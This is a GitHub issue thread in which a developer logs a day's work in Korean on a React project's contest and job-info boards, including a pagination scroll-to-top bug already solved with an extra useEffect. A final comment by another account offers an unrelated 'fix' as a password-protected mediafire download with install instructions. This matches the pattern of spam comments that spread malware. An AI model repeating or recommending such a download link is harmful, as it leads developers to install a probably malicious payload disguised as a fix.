### ISSUE TITLE
2024.08.27(화)

### ISSUE THREAD

**Issue by yyerrim** [kyj4327/DevBox#55]
오늘은 어떻게 프로젝트에 기여했나요?
-------------------------------
> contest 게시판
- Contest List, Write, Update 기본 틀 작성
- ContestWrite : "저장하기" 버튼 클릭시 DB로 데이터 전달 구현
- ContestList : DB에 저장된 데이터 불러오기 구현
- delete 기능 구현
- update 기능 구현
- pagination 기능 구현 (Server/Client)

> Write
- WriteLong, WriteShort 컴포넌트 생성
→ hiring, contest 게시판에 적용

> JobInfo 게시판
- JobInfo 컴포넌트 생성
→ JobInfoList에 적용

> pagination
- Previous, Next 클릭시에도 스크롤이 맨 위로 이동하도록 수정

> 사소한 수정
- class → className
- label for → label htmlFor
- 모든 list 게시판 map key 추가

오늘의 프로젝트에서 힘든 점은 무엇인가요?
---------------------------
> pagination Previous, Next 버튼에 window.scrollTo(0, 0) 가 적용되지 않아 힘들었다.
- pagination 컴포넌트에서 버튼에 적용되어있는 disabled를 지우면 적용이 되지만 없으면 안되는 속성이기에 다른 방법을 찾아야했다.
- 기존 : currentPage가 바뀔때마다 렌더링되는 useEffect에 스크롤 코드 작성
- 새로운 useEffect를 만들어서 data가 바뀔때마다 스크롤이 맨 위로 올라가도록 코드 작성
( currentPage 값 변경 → 기존 useEffect 렌더링 → data 값 변경 → 새 useEffect 렌더링 → 스크롤 맨 위로 이동 )
- Previous, Next  버튼을 클릭해도 스크롤 코드가 적용되는것을 확인할 수 있었다.

내일을 위해 기여해야 하는 일은?
-------------------------------
- contest 게시판 D-day 계산 기능 구현
- 회의실 대여 서비스 세부사항 구상

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
